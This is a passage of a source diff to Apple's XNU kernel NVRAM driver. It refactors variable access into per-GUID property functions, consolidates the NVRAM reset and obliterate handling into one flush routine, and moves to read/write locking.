} static bool @@ -540,7 +487,7 @@ parseVariableName(const char *key, uuid_t *guidResult, const char **nameResult) { uuid_string_t temp = {0}; size_t keyLen = strlen(key); - bool result = false; + bool ok = false; const char *name = key; uuid_t guid; @@ -551,12 +498,12 @@ parseVariableName(const char *key, uuid_t *guidResult, const char **nameResult) if ((uuid_parse(temp, guid) == 0) && (key[sizeof(temp) - 1] == ':')) { name = key + sizeof(temp); - result = true; + ok = true; } } if (guidResult) { - result ? uuid_copy(*guidResult, guid) : uuid_copy(*guidResult, gAppleNVRAMGuid); + ok ? uuid_copy(*guidResult, guid) : uuid_copy(*guidResult, gAppleNVRAMGuid); } if (nameResult) { *nameResult = name; @@ -565,6 +512,19 @@ parseVariableName(const char *key, uuid_t *guidResult, const char **nameResult) return false; } +static bool +skipKey(const OSSymbol *aKey) +{ + return aKey->isEqualTo(kIOClassNameOverrideKey) || + aKey->isEqualTo(kIOBSDNameKey) || + aKey->isEqualTo(kIOBSDNamesKey) || + aKey->isEqualTo(kIOBSDMajorKey) || + aKey->isEqualTo(kIOBSDMinorKey) || + aKey->isEqualTo(kIOBSDUnitKey); +} + +// ************************** IODTNVRAMVariables **************************** + // private IOService based class for publishing distinct dictionary properties on // for easy ioreg access since the serializeProperties call is overloaded and is used // as variable access @@ -573,14 +533,20 @@ class IODTNVRAMVariables : public IOService OSDeclareDefaultStructors(IODTNVRAMVariables) private: IODTNVRAM *_provider; - OSDictionary *_properties; + OSDictionary *_variables; uuid_t _guid; public: - bool init(const uuid_t *guid); - virtual bool start(IOService * provider) APPLE_KEXT_OVERRIDE; - virtual IOReturn setProperties(OSObject * properties) APPLE_KEXT_OVERRIDE; - virtual bool serializeProperties(OSSerialize *s) const APPLE_KEXT_OVERRIDE; + bool init(const uuid_t *guid); + virtual bool start(IOService * provider) APPLE_KEXT_OVERRIDE; + virtual IOReturn setVariables(OSObject * properties); + + virtual bool serializeProperties(OSSerialize *s) const APPLE_KEXT_OVERRIDE; + virtual OSPtr copyProperty(const OSSymbol *aKey) const APPLE_KEXT_OVERRIDE; + virtual OSObject *getProperty(const OSSymbol *aKey) const APPLE_KEXT_OVERRIDE; + virtual bool setProperty(const OSSymbol *aKey, OSObject *anObject) APPLE_KEXT_OVERRIDE; + virtual IOReturn setProperties(OSObject *properties) APPLE_KEXT_OVERRIDE; + virtual void removeProperty(const OSSymbol *aKey) APPLE_KEXT_OVERRIDE; }; OSDefineMetaClassAndStructors(IODTNVRAMVariables, IOService) @@ -588,23 +554,30 @@ OSDefineMetaClassAndStructors(IODTNVRAMVariables, IOService) bool IODTNVRAMVariables::init(const uuid_t *guid) { - require(super::init(), error); - require(guid, error); + if (!super::init()) { + return false; + } + + if (guid == nullptr) { + return false; + } uuid_copy(_guid, *guid); return true; - -error: - return false; } bool IODTNVRAMVariables::start(IOService * provider) { - require(IOService::start(provider), error); + if (!IOService::start(provider)) { + goto error; + } - require(_provider = OSDynamicCast(IODTNVRAM, provider), error); + _provider = OSDynamicCast(IODTNVRAM, provider); + if (_provider == nullptr) { + goto error; + } registerService(); @@ -617,15 +590,15 @@ error: } IOReturn -IODTNVRAMVariables::setProperties(OSObject * properties) +IODTNVRAMVariables::setVariables(OSObject * variables) { - if (OSDynamicCast(OSDictionary, properties)) { - OSSafeReleaseNULL(_properties); - _properties = OSDynamicCast(OSDictionary, properties); - properties->retain(); + if (OSDynamicCast(OSDictionary, variables)) { + OSSafeReleaseNULL(_variables); + _variables = OSDynamicCast(OSDictionary, variables); + variables->retain(); } - return IOService::setProperties(properties); + return kIOReturnSuccess; } bool @@ -634,30 +607,123 @@ IODTNVRAMVariables::serializeProperties(OSSerialize *s) const const OSSymbol *key; OSSharedPtr dict; OSSharedPtr iter; - OSSharedPtr localProperties(_properties, OSRetain); - bool result = false; + OSSharedPtr localVariables(_variables, OSRetain); + bool ok = false; - require(localProperties != nullptr, exit); + if (localVariables == nullptr) { + goto exit; + } - dict = OSDictionary::withCapacity(localProperties->getCount()); - require_action(dict, exit, DEBUG_ERROR("No dictionary\n")); + dict = OSDictionary::withCapacity(localVariables->getCount()); + if (dict == nullptr) { + DEBUG_ERROR("No dictionary\n"); + goto exit; + } - iter = OSCollectionIterator::withCollection(localProperties.get()); - require_action(iter, exit, DEBUG_ERROR("failed to create iterator\n")); + iter = OSCollectionIterator::withCollection(localVariables.get()); + if (iter == nullptr) { + DEBUG_ERROR("failed to create iterator\n"); + goto exit; + } while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) { if (verifyPermission(kIONVRAMOperationRead, &_guid, key)) { - dict->setObject(key, localProperties->getObject(key)); + dict->setObject(key, localVariables->getObject(key)); } } - result = dict->serialize(s); + ok = dict->serialize(s); exit: - DEBUG_INFO("result=%d\n", result); - return result; + DEBUG_INFO("ok=%d\n", ok); + return ok; +} + +OSPtr +IODTNVRAMVariables::copyProperty(const OSSymbol *aKey) const +{ + if (_provider && !skipKey(aKey)) { + DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy()); + + return _provider->copyPropertyWithGUIDAndName(&_guid, aKey->getCStringNoCopy()); + } else { + return nullptr; + } } +OSObject * +IODTNVRAMVariables::getProperty(const OSSymbol *aKey) const +{ + OSSharedPtr theObject = copyProperty(aKey); + + return theObject.get(); +} + +bool +IODTNVRAMVariables::setProperty(const OSSymbol *aKey, OSObject *anObject) +{ + if (_provider) { + return _provider->setPropertyWithGUIDAndName(&_guid, aKey->getCStringNoCopy(), anObject); + } else { + return false; + } +} + +IOReturn +IODTNVRAMVariables::setProperties(OSObject *properties) +{ + IOReturn ret = kIOReturnSuccess; + OSObject *object; + const OSSymbol *key; + OSDictionary *dict; + OSSharedPtr iter; + + if (_provider) { + dict = OSDynamicCast(OSDictionary, properties); + if (dict == nullptr) { + DEBUG_ERROR("Not a dictionary\n"); + return kIOReturnBadArgument; + } + + iter = OSCollectionIterator::withCollection(dict); + if (iter == nullptr) { + DEBUG_ERROR("Couldn't create iterator\n"); + return kIOReturnBadArgument; + } + + while (ret == kIOReturnSuccess) { + key = OSDynamicCast(OSSymbol, iter->getNextObject()); + if (key == nullptr) { + break; + } + + object = dict->getObject(key); + if (object == nullptr) { + continue; + } + + ret = setProperty(key, object); + } + } else { + ret = kIOReturnNotReady; + } + + DEBUG_INFO("ret=%#08x\n", ret); + + return ret; +} + +void +IODTNVRAMVariables::removeProperty(const OSSymbol *aKey) +{ + if (_provider) { + _provider->removePropertyWithGUIDAndName(&_guid, aKey->getCStringNoCopy()); + } +} + + +// **************************** IODTNVRAM ********************************* + bool IODTNVRAM::init(IORegistryEntry *old, const IORegistryPlane *plane) { @@ -667,7 +733,17 @@ IODTNVRAM::init(IORegistryEntry *old, const IORegistryPlane *plane) return false; } - _variableLock = IOLockAlloc(); + PE_parse_boot_argn("nvram-log", &gNVRAMLogging, sizeof(gNVRAMLogging)); + +#if XNU_TARGET_OS_OSX +#if CONFIG_CSR + gInternalBuild = (csr_check(CSR_ALLOW_APPLE_INTERNAL) == 0); +#endif // CONFIG_CSR +#endif // XNU_TARGET_OS_OSX + + DEBUG_INFO("gInternalBuild = %d\n", gInternalBuild); + + _variableLock = IORWLockAlloc(); if (!_variableLock) { return false; } @@ -677,8 +753,6 @@ IODTNVRAM::init(IORegistryEntry *old, const IORegistryPlane *plane) return false; } - PE_parse_boot_argn("nvram-log", &gNVRAMLogging, sizeof(gNVRAMLogging)); - dict = OSDictionary::withCapacity(1); if (dict == nullptr) { return false; @@ -789,12 +863,14 @@ IODTNVRAM::registerNVRAMController(IONVRAMController *nvram) DEBUG_INFO("setting controller\n"); + CONTROLLERLOCK(); _nvramController = nvram; + CONTROLLERUNLOCK(); // race condition possible between // IODTNVRAM and IONVRAMController (restore loses boot-args) if (!_isProxied) { - DEBUG_INFO("Proxied NVRAM data\n"); + DEBUG_INFO("Reading non-proxied NVRAM data\n"); _nvramController->read(0, _nvramImage, _nvramSize); initNVRAMImage(); } @@ -850,7 +926,7 @@ no_system: no_common: ret = serializeVariables(); - DEBUG_INFO("serializeVariables ret=0x%08x\n", ret); + DEBUG_INFO("serializeVariables ret=%#08x\n", ret); } void @@ -867,8 +943,11 @@ IODTNVRAM::initNVRAMImage(void) while (currentOffset < _nvramSize) { bool common_partition; bool system_partition; - chrp_nvram_header_t * header = (chrp_nvram_header_t *)(_nvramImage + currentOffset); + const uint8_t common_v1_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_COMMON_V1}; + const uint8_t common_v2_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_COMMON_V2}; + const uint8_t system_v1_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_SYSTEM_V1}; + const uint8_t system_v2_name[sizeof(header->name)] = {NVRAM_CHRP_PARTITION_NAME_SYSTEM_V2}; currentLength = header->len * NVRAM_CHRP_LENGTH_BLOCK_SIZE; @@ -883,9 +962,10 @@ IODTNVRAM::initNVRAMImage(void) break; } - common_partition = memcmp(header->name, NVRAM_CHRP_PARTITION_NAME_COMMON, strlen(NVRAM_CHRP_PARTITION_NAME_COMMON)) == 0; - system_partition = (memcmp(header->name, NVRAM_CHRP_PARTITION_NAME_SYSTEM, strlen(NVRAM_CHRP_PARTITION_NAME_SYSTEM)) == 0) || - (memcmp(header->name, NVRAM_CHRP_PARTITION_NAME_SYSTEM_LEGACY, strlen(NVRAM_CHRP_PARTITION_NAME_SYSTEM_LEGACY)) == 0); + common_partition = (memcmp(header->name, common_v1_name, sizeof(header->name)) == 0) || + (memcmp(header->name, common_v2_name, sizeof(header->name)) == 0); + system_partition = (memcmp(header->name, system_v1_name, sizeof(header->name)) == 0) || + (memcmp(header->name, system_v2_name, sizeof(header->name)) == 0); if (common_partition) { _commonPartitionOffset = partitionOffset; @@ -897,8 +977,8 @@ IODTNVRAM::initNVRAMImage(void) OSSharedPtr partitionOffsetNumber, partitionLengthNumber; // Construct the partition ID from the signature and name. - snprintf(partitionID, sizeof(partitionID), "0x%02x,", header->sig); - strncpy(partitionID + 5, header->name, sizeof(header->name)); + snprintf(partitionID, sizeof(partitionID), "%#02x,", header->sig); + memcpy(partitionID + 5, header->name, sizeof(header->name)); partitionID[17] = '\0'; partitionOffsetNumber = OSNumber::withNumber(partitionOffset, 32); @@ -919,7 +999,7 @@ IODTNVRAM::initNVRAMImage(void) _systemImage = _nvramImage + _systemPartitionOffset; } - DEBUG_ALWAYS("NVRAM : ofPartitionOffset - 0x%x, ofPartitionSize - 0x%x, systemPartitionOffset - 0x%x, systemPartitionSize - 0x%x\n", + DEBUG_ALWAYS("NVRAM : commonPartitionOffset - %#x, commonPartitionSize - %#x, systemPartitionOffset - %#x, systemPartitionSize - %#x\n", (unsigned int) _commonPartitionOffset, (unsigned int) _commonPartitionSize, (unsigned int) _systemPartitionOffset, (unsigned int) _systemPartitionSize); _lastDeviceSync = 0; @@ -963,10 +1043,10 @@ IODTNVRAM::serializeProperties(OSSerialize *s) const const OSSymbol *key; OSSharedPtr systemDict, commonDict, dict; OSSharedPtr iter; - bool result = false; + bool ok = false; unsigned int totalCapacity = 0; - NVRAMLOCK(); + NVRAMREADLOCK(); if (_commonDict) { commonDict = OSDictionary::withDictionary(_commonDict.get()); } @@ -1021,12 +1101,12 @@ IODTNVRAM::serializeProperties(OSSerialize *s) const } } - result = dict->serialize(s); + ok = dict->serialize(s); exit: - DEBUG_INFO("result=%d\n", result); + DEBUG_INFO("ok=%d\n", ok); - return result; + return ok; } IOReturn @@ -1048,89 +1128,89 @@ IODTNVRAM::chooseDictionary(IONVRAMOperation operation, const uuid_t *varGuid, c DEBUG_INFO("Using common dictionary\n"); *dict = _commonDict.get(); } - } else { + return kIOReturnSuccess; + } else if (_commonDict != nullptr) { DEBUG_INFO("Defaulting to common dictionary\n"); *dict = _commonDict.get(); + return kIOReturnSuccess; } - return kIOReturnSuccess; + return kIOReturnNotFound; } -bool -IODTNVRAM::handleSpecialVariables(const char *name, uuid_t *guid, OSObject *obj, IOReturn *error) +IOReturn +IODTNVRAM::flushDict(const uuid_t *guid, IONVRAMOperation op) { IOReturn err = kIOReturnSuccess; - bool special = false; - NVRAMLOCKASSERT(); + if ((_systemDict != nullptr) && (uuid_compare(*guid, gAppleSystemVariableGuid) == 0)) { + const OSSymbol *key; + OSSharedPtr newDict; + OSSharedPtr iter; - if (strcmp(name, "ResetNVRam") == 0) { - DEBUG_INFO("%s requested\n", name); + newDict = OSDictionary::withCapacity(_systemDict->getCapacity()); + iter = OSCollectionIterator::withCollection(_systemDict.get()); + if ((newDict == nullptr) || (iter == nullptr)) { + err = kIOReturnNoMemory; + goto exit; + } - if (uuid_compare(*guid, gAppleSystemVariableGuid) == 0) { - if (_systemDict != nullptr) { - _systemDict->flushCollection(); + while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) { + if (!verifyPermission(op, &gAppleSystemVariableGuid, key)) { + newDict->setObject(key, _systemDict->getObject(key)); } - - _commonDict->flushCollection(); - DEBUG_INFO("system & common dictionary flushed\n"); } - special = true; - } else if (strcmp(name, "ObliterateNVRam") == 0) { - DEBUG_INFO("%s requested\n", name); + _systemDict = newDict; - if ((_systemDict != nullptr) && (uuid_compare(*guid, gAppleSystemVariableGuid) == 0)) { - const OSSymbol *key; - OSSharedPtr newDict; - OSSharedPtr iter; + DEBUG_INFO("system dictionary flushed\n"); + } else if ((_commonDict != nullptr) && (uuid_compare(*guid, gAppleNVRAMGuid) == 0)) { + const OSSymbol *key; + OSSharedPtr newDict; + OSSharedPtr iter; - newDict = OSDictionary::withCapacity(_systemDict->getCapacity()); - iter = OSCollectionIterator::withCollection(newDict.get()); - if ((newDict == nullptr) || (iter == nullptr)) { - err = kIOReturnNoMemory; - goto exit; - } - - while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) { - const OSSymbol *key = OSDynamicCast(OSSymbol, iter->getNextObject()); - if (key == nullptr) { - err = kIOReturnNoMemory; - goto exit; - } + newDict = OSDictionary::withCapacity(_commonDict->getCapacity()); + iter = OSCollectionIterator::withCollection(_commonDict.get()); + if ((newDict == nullptr) || (iter == nullptr)) { + err = kIOReturnNoMemory; + goto exit; + } - if (!verifyPermission(kIONVRAMOperationObliterate, &gAppleSystemVariableGuid, key)) { - newDict->setObject(key, _systemDict->getObject(key)); - } + while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) { + if (!verifyPermission(op, &gAppleNVRAMGuid, key)) { + newDict->setObject(key, _commonDict->getObject(key)); } + } - _systemDict = newDict; + _commonDict = newDict; - DEBUG_INFO("system dictionary flushed\n"); - } else if (_commonDict != nullptr) { - const OSSymbol *key; - OSSharedPtr newDict; - OSSharedPtr iter; + DEBUG_INFO("common dictionary flushed\n"); + } - newDict = OSDictionary::withCapacity(_commonDict->getCapacity()); - iter = OSCollectionIterator::withCollection(newDict.get()); - if ((newDict == nullptr) || (iter == nullptr)) { - err = kIOReturnNoMemory; - goto exit; - } +exit: + return err; +} - while ((key = OSDynamicCast(OSSymbol, iter->getNextObject()))) { - if (!verifyPermission(kIONVRAMOperationObliterate, &gAppleNVRAMGuid, key)) { - newDict->setObject(key, _commonDict->getObject(key)); - } - } +bool +IODTNVRAM::handleSpecialVariables(const char *name, const uuid_t *guid, const OSObject *obj, IOReturn *error) +{ + IOReturn err = kIOReturnSuccess; + bool special = false; - _commonDict = newDict; + NVRAMLOCKASSERTEXCLUSIVE(); - DEBUG_INFO("common dictionary flushed\n"); + // ResetNVRam flushes both regions in one call + // Obliterate can flush either separately + if (strcmp(name, "ObliterateNVRam") == 0) { + err = flushDict(guid, kIONVRAMOperationObliterate); + } else if (strcmp(name, "ResetNVRam") == 0) { + err = flushDict(&gAppleSystemVariableGuid, kIONVRAMOperationReset); + + if (err != kIOReturnSuccess) { + goto exit; } - special = true; + err = flushDict(&gAppleNVRAMGuid, kIONVRAMOperationReset); } exit: @@ -1142,39 +1222,25 @@ exit: } OSSharedPtr -IODTNVRAM::copyProperty(const OSSymbol *aKey) const +IODTNVRAM::copyPropertyWithGUIDAndName(const uuid_t *guid, const char *name) const { IOReturn result; - const char *variableName; - uuid_t varGuid; OSDictionary *dict; OSSharedPtr theObject = nullptr; - if (aKey->isEqualTo(kIOBSDNameKey) || - aKey->isEqualTo(kIOBSDNamesKey) || - aKey->isEqualTo(kIOBSDMajorKey) || - aKey->isEqualTo(kIOBSDMinorKey) || - aKey->isEqualTo(kIOBSDUnitKey)) { - // These will never match. - // Check here and exit to avoid logging spam - return nullptr; - } - DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy()); - - parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName); - - result = chooseDictionary(kIONVRAMOperationRead, &varGuid, variableName, &dict); + result = chooseDictionary(kIONVRAMOperationRead, guid, name, &dict); if (result != kIOReturnSuccess) { + DEBUG_INFO("No dictionary\n"); goto exit; } - if (!verifyPermission(kIONVRAMOperationRead, &varGuid, variableName)) { + if (!verifyPermission(kIONVRAMOperationRead, guid, name)) { DEBUG_INFO("Not privileged\n"); goto exit; } - NVRAMLOCK(); - theObject.reset(dict->getObject(variableName), OSRetain); + NVRAMREADLOCK(); + theObject.reset(dict->getObject(name), OSRetain); NVRAMUNLOCK(); if (theObject != nullptr) { @@ -1185,6 +1251,22 @@ exit: return theObject; } +OSSharedPtr +IODTNVRAM::copyProperty(const OSSymbol *aKey) const +{ + const char *variableName; + uuid_t varGuid; + + if (skipKey(aKey)) { + return nullptr; + } + DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy()); + + parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName); + + return copyPropertyWithGUIDAndName(&varGuid, variableName); +} + OSSharedPtr IODTNVRAM::copyProperty(const char *aKey) const { @@ -1220,64 +1302,64 @@ IODTNVRAM::getProperty(const char *aKey) const } IOReturn -IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject) +IODTNVRAM::setPropertyWithGUIDAndName(const uuid_t *guid, const char *name, OSObject *anObject) { - IOReturn result = kIOReturnSuccess; + IOReturn ret = kIOReturnSuccess; bool remove = false; OSString *tmpString = nullptr; OSSharedPtr propObject, oldObject; OSSharedPtr sharedObject(anObject, OSRetain); - const char *variableName; - uuid_t varGuid; OSDictionary *dict; bool deletePropertyKey, syncNowPropertyKey, forceSyncNowPropertyKey; bool ok; size_t propDataSize = 0; - DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy()); - - parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName); - deletePropertyKey = strncmp(variableName, kIONVRAMDeletePropertyKey, sizeof(kIONVRAMDeletePropertyKey)) == 0; - syncNowPropertyKey = strncmp(variableName, kIONVRAMSyncNowPropertyKey, sizeof(kIONVRAMSyncNowPropertyKey)) == 0; - forceSyncNowPropertyKey = strncmp(variableName, kIONVRAMForceSyncNowPropertyKey, sizeof(kIONVRAMForceSyncNowPropertyKey)) == 0; + deletePropertyKey = strncmp(name, kIONVRAMDeletePropertyKey, sizeof(kIONVRAMDeletePropertyKey)) == 0; + syncNowPropertyKey = strncmp(name, kIONVRAMSyncNowPropertyKey, sizeof(kIONVRAMSyncNowPropertyKey)) == 0; + forceSyncNowPropertyKey = strncmp(name, kIONVRAMForceSyncNowPropertyKey, sizeof(kIONVRAMForceSyncNowPropertyKey)) == 0; if (deletePropertyKey) { tmpString = OSDynamicCast(OSString, anObject); if (tmpString != nullptr) { + const char *variableName; + uuid_t varGuid; + DEBUG_INFO("kIONVRAMDeletePropertyKey found\n"); - OSSharedPtr sharedKey = OSSymbol::withString(tmpString); - removeProperty(sharedKey.get()); + + parseVariableName(tmpString->getCStringNoCopy(), &varGuid, &variableName); + removePropertyWithGUIDAndName(&varGuid, variableName); } else { DEBUG_INFO("kIONVRAMDeletePropertyKey value needs to be an OSString\n"); - result = kIOReturnError; + ret = kIOReturnError; } goto exit; } else if (syncNowPropertyKey || forceSyncNowPropertyKey) { tmpString = OSDynamicCast(OSString, anObject); - DEBUG_INFO("NVRAM sync key %s found\n", aKey->getCStringNoCopy()); + DEBUG_INFO("NVRAM sync key %s found\n", name); if (tmpString != nullptr) { // We still want to throttle NVRAM commit rate for SyncNow. ForceSyncNow is provided as a really big hammer. syncInternal(syncNowPropertyKey); } else { - DEBUG_INFO("%s value needs to be an OSString\n", variableName); - result = kIOReturnError; + DEBUG_INFO("%s value needs to be an OSString\n", name); + ret = kIOReturnError; } goto exit; } - result = chooseDictionary(kIONVRAMOperationWrite, &varGuid, variableName, &dict); - if (result != kIOReturnSuccess) { + ret = chooseDictionary(kIONVRAMOperationWrite, guid, name, &dict); + if (ret != kIOReturnSuccess) { + DEBUG_INFO("No dictionary\n"); goto exit; } - if (!verifyPermission(kIONVRAMOperationWrite, &varGuid, variableName)) { + if (!verifyPermission(kIONVRAMOperationWrite, guid, name)) { DEBUG_INFO("Not privileged\n"); - result = kIOReturnNotPrivileged; + ret = kIOReturnNotPrivileged; goto exit; } // Make sure the object is of the correct type. - switch (getVariableType(variableName)) { + switch (getVariableType(name)) { case kOFVariableTypeBoolean: propObject = OSDynamicPtrCast(sharedObject); break; @@ -1291,9 +1373,9 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject) if (propObject != nullptr) { propDataSize = (OSDynamicPtrCast(propObject))->getLength(); - if (aKey->isEqualTo(kIONVRAMBootArgsKey) && (propDataSize >= BOOT_LINE_LENGTH)) { + if ((strncmp(name, kIONVRAMBootArgsKey, sizeof(kIONVRAMBootArgsKey)) == 0) && (propDataSize >= BOOT_LINE_LENGTH)) { DEBUG_ERROR("boot-args size too large for BOOT_LINE_LENGTH, propDataSize=%zu\n", propDataSize); - result = kIOReturnNoSpace; + ret = kIOReturnNoSpace; goto exit; } } @@ -1325,18 +1407,18 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject) if (propObject == nullptr) { DEBUG_INFO("No property object\n"); - result = kIOReturnBadArgument; + ret = kIOReturnBadArgument; goto exit; } - if (!verifyWriteSizeLimit(&varGuid, variableName, propDataSize)) { - DEBUG_ERROR("Property data size of %zu too long for %s\n", propDataSize, variableName); - result = kIOReturnNoSpace; + if (!verifyWriteSizeLimit(guid, name, propDataSize)) { + DEBUG_ERROR("Property data size of %zu too long for %s\n", propDataSize, name); + ret = kIOReturnNoSpace; goto exit; } - NVRAMLOCK(); - ok = handleSpecialVariables(variableName, &varGuid, propObject.get(), &result); + NVRAMWRITELOCK(); + ok = handleSpecialVariables(name, guid, propObject.get(), &ret); NVRAMUNLOCK(); if (ok) { @@ -1344,39 +1426,42 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject) goto exit; } - NVRAMLOCK(); - oldObject.reset(dict->getObject(variableName), OSRetain); + NVRAMREADLOCK(); + oldObject.reset(dict->getObject(name), OSRetain); + NVRAMUNLOCK(); + if (remove == false) { DEBUG_INFO("Adding object\n"); - if (!dict->setObject(variableName, propObject.get())) { - result = kIOReturnBadArgument; + NVRAMWRITELOCK(); + if (!dict->setObject(name, propObject.get())) { + ret = kIOReturnBadArgument; } + NVRAMUNLOCK(); } else { DEBUG_INFO("Removing object\n"); // Check for existence so we can decide whether we need to sync variables if (oldObject) { - result = removePropertyInternal(aKey); + ret = removePropertyWithGUIDAndName(guid, name); } else { - result = kIOReturnNotFound; + ret = kIOReturnNotFound; } } - NVRAMUNLOCK(); - if (result == kIOReturnSuccess) { - result = serializeVariables(); - if (result != kIOReturnSuccess) { - DEBUG_ERROR("serializeVariables failed, result=0x%08x\n", result); + if (ret == kIOReturnSuccess) { + ret = serializeVariables(); + if (ret != kIOReturnSuccess) { + DEBUG_ERROR("serializeVariables failed, ret=%#08x\n", ret); - NVRAMLOCK(); + NVRAMWRITELOCK(); if (oldObject) { - dict->setObject(variableName, oldObject.get()); + dict->setObject(name, oldObject.get()); } else { - dict->removeObject(variableName); + dict->removeObject(name); } NVRAMUNLOCK(); (void) serializeVariables(); - result = kIOReturnNoMemory; + ret = kIOReturnNoMemory; } } @@ -1388,9 +1473,22 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject) } exit: - DEBUG_INFO("result=0x%08x\n", result); + DEBUG_INFO("ret=%#08x\n", ret); - return result; + return ret; +} + +IOReturn +IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject) +{ + const char *variableName; + uuid_t varGuid; + + DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy()); + + parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName); + + return setPropertyWithGUIDAndName(&varGuid, variableName, anObject); } bool @@ -1404,55 +1502,77 @@ IODTNVRAM::removeProperty(const OSSymbol *aKey) { IOReturn ret; - NVRAMLOCK(); ret = removePropertyInternal(aKey); - NVRAMUNLOCK(); if (ret == kIOReturnSuccess) { serializeVariables(); } else { - DEBUG_INFO("removePropertyInternal failed, ret=0x%08x\n", ret); + DEBUG_INFO("removePropertyInternal failed, ret=%#08x\n", ret); } } IOReturn -IODTNVRAM::removePropertyInternal(const OSSymbol *aKey) +IODTNVRAM::removePropertyWithGUIDAndName(const uuid_t *guid, const char *name) { - IOReturn result; - const char *variableName; - uuid_t varGuid; + IOReturn ret; OSDictionary *dict; + bool removed = false; - DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy()); - - NVRAMLOCKASSERT(); - - parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName); + DEBUG_INFO("name=%s\n", name); - result = chooseDictionary(kIONVRAMOperationDelete, &varGuid, variableName, &dict); - if (result != kIOReturnSuccess) { + ret = chooseDictionary(kIONVRAMOperationDelete, guid, name, &dict); + if (ret != kIOReturnSuccess) { + DEBUG_INFO("No dictionary\n"); goto exit; } - if (!verifyPermission(kIONVRAMOperationDelete, &varGuid, variableName)) { + if (!verifyPermission(kIONVRAMOperationDelete, guid, name)) { DEBUG_INFO("Not priveleged\n"); - result = kIOReturnNotPrivileged; + ret = kIOReturnNotPrivileged; goto exit; } + NVRAMWRITELOCK(); + // If the object exists, remove it from the dictionary. - if (dict->getObject(variableName) != nullptr) { - dict->removeObject(variableName); + if (dict->getObject(name) != nullptr) { + dict->removeObject(name); + removed = true; + } else { + DEBUG_INFO("%s not found\n", name); + } + + NVRAMUNLOCK(); + + if (removed) { + ret = serializeVariables(); + DEBUG_INFO("serializeVariables ret=0x%08x\n", ret); } exit: - return result; + return ret; +} + +IOReturn +IODTNVRAM::removePropertyInternal(const OSSymbol *aKey) +{ + IOReturn ret; + const char *variableName; + uuid_t varGuid; + + DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy()); + + parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName); + + ret = removePropertyWithGUIDAndName(&varGuid, variableName); + + return ret; } IOReturn IODTNVRAM::setProperties(OSObject *properties) { - IOReturn result = kIOReturnSuccess; + IOReturn ret = kIOReturnSuccess; OSObject *object; const OSSymbol *key; OSDictionary *dict; @@ -1470,7 +1590,7 @@ IODTNVRAM::setProperties(OSObject *properties) return kIOReturnBadArgument; } - while (result == kIOReturnSuccess) { + while (ret == kIOReturnSuccess) { key = OSDynamicCast(OSSymbol, iter->getNextObject()); if (key == nullptr) { break; @@ -1481,12 +1601,12 @@ IODTNVRAM::setProperties(OSObject *properties) continue; } - result = setPropertyInternal(key, object); + ret = setPropertyInternal(key, object); } - DEBUG_INFO("result=0x%08x\n", result); + DEBUG_INFO("ret=%#08x\n", ret); - return result; + return ret; } IOReturn @@ -1634,8 +1754,8 @@ IODTNVRAM::initVariables(void) OSSharedPtr propSymbol; OSSharedPtr propObject; NVRAMRegionInfo *currentRegion; - NVRAMRegionInfo variableRegions[] = { { NVRAM_CHRP_PARTITION_NAME_COMMON, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage}, - { NVRAM_CHRP_PARTITION_NAME_SYSTEM, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} }; + NVRAMRegionInfo variableRegions[] = { { kIONVRAMPartitionCommon, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage}, + { kIONVRAMPartitionSystem, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} }; DEBUG_INFO("...\n"); @@ -1648,7 +1768,7 @@ IODTNVRAM::initVariables(void) currentRegion->dict = OSDictionary::withCapacity(1); - DEBUG_INFO("region = %s\n", currentRegion->name); + DEBUG_INFO("region = %d\n", currentRegion->type); cnt = 0; while (cnt < currentRegion->size) { // Break if there is no name. @@ -1695,14 +1815,23 @@ IODTNVRAM::initVariables(void) } // Create the boot-args property if it is not in the dictionary. - if (_commonDict->getObject(kIONVRAMBootArgsKey) == nullptr) { - propObject = OSString::withCStringNoCopy(""); - if (propObject != nullptr) { - _commonDict->setObject(kIONVRAMBootArgsKey, propObject.get()); + if (_systemDict != nullptr) { + if (_systemDict->getObject(kIONVRAMBootArgsKey) == nullptr) { + propObject = OSString::withCStringNoCopy(""); + if (propObject != nullptr) { + _systemDict->setObject(kIONVRAMBootArgsKey, propObject.get()); + } + } + } else if (_commonDict != nullptr) { + if (_commonDict->getObject(kIONVRAMBootArgsKey) == nullptr) { + propObject = OSString::withCStringNoCopy(""); + if (propObject != nullptr) { + _commonDict->setObject(kIONVRAMBootArgsKey, propObject.get()); + } } } - DEBUG_INFO("%s _commonDict=%p _systemDict=%p\n", __FUNCTION__, _commonDict.get(), _systemDict.get()); + DEBUG_INFO("%s _commonDict=%p _systemDict=%p\n", __FUNCTION__, _commonDict ? _commonDict.get() : nullptr, _systemDict ? _systemDict.get() : nullptr); return kIOReturnSuccess; } @@ -1728,8 +1857,8 @@ IODTNVRAM::serializeVariables(void) UInt32 commonUsed = 0; OSSharedPtr nvramImage; NVRAMRegionInfo *currentRegion; - 